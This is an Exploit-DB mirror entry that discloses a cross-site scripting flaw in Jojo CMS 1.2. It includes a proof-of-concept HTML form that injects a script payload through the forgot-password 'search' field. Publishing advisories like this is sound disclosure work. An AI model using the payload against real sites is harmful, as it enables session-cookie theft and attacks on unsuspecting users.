exploit-db-mirror/platforms/php/webapps/38518.txt
Offensive Security e75323a0d9 DB: 2015-10-24
13 new exploits
2015-10-24 05:03:12 +00:00

12 lines
636 B
Text
Executable file

source: http://www.securityfocus.com/bid/59933/info
Jojo CMS is prone to a cross-site scripting vulnerability.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Jojo CMS 1.2 is vulnerable; other versions may also be affected.
<form action="http://www.example.com/forgot-password/" method="post">
<input type="hidden" name="search" value='<script>alert(document.cookike);</script>'>
<input type="submit" id="btn">
</form>